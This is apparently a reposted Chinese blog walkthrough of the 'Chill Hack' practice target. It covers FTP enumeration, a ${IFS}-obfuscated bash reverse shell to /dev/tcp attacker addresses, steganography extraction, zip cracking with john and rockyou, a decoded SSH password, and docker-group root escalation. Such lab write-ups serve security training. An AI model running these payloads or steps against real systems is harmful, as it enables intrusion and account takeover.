chill_hack靶机攻略

这篇具有很好参考价值的文章主要介绍了chill_hack靶机攻略。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

chill_hack靶机攻略

扫描

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

渗透

ftp开放,提示ftp连接

连接过后发现一个文本文件

下载下来

ftp 10.4.7.155
ftp
ftp
dir
get note.txt

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

查看内容

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

此处可以知道两个用户名,并且提示命令被过滤

bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.132/8888 0>&1'
bash${IFS}-c${IFS}'bash${IFS}-i${IFS}>&${IFS}/dev/tcp/10.4.7.138/12138 0>&1'

提权

使用sudo -l

发现可以以appar身份执行.sh文件

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

看代码感觉没什么用

在/var/www/files中发现hacker.php

查看源码

两行提示可能有图片隐写

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

靶机开启pythonweb服务

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

使用工具

steghide extract -sf hacker-with-laptop_23-2147985341.jpg

发现有个压缩包,但是解压需要密码

zip2john backup.zip > backup.john
# 将名为 backup.zip 的 ZIP 文件的密码哈希提取出来,并将结果保存到名为 backup.john 的文件中
john --wordlist=/usr/share/wordlists/rockyou.txt backup.john 

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

pass1word

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

查看一下解压出来的东西

发现密文

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

IWQwbnRLbjB3bVlwQHNzdzByZA==
#base64解码
!d0ntKn0wmYp@ssw0rd

家目录下可以看到有三个用户,挨个尝试ssh登录,发现只有anurodh可以登录

anurodh:!d0ntKn0wmYp@ssw0rd

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

id发现该用户在docker组内

怀疑在docker里

查看该文件,确认一下是不是在docker里

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全

发现就是在docker里

查看docker镜像

docker images

提权

docker run -it -v /root:/mnt alpine

chill_hack靶机攻略,靶机系列,java,数据库,开发语言,网络安全,安全,web安全文章来源地址https://www.toymoban.com/news/detail-734641.html

到了这里,关于chill_hack靶机攻略的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包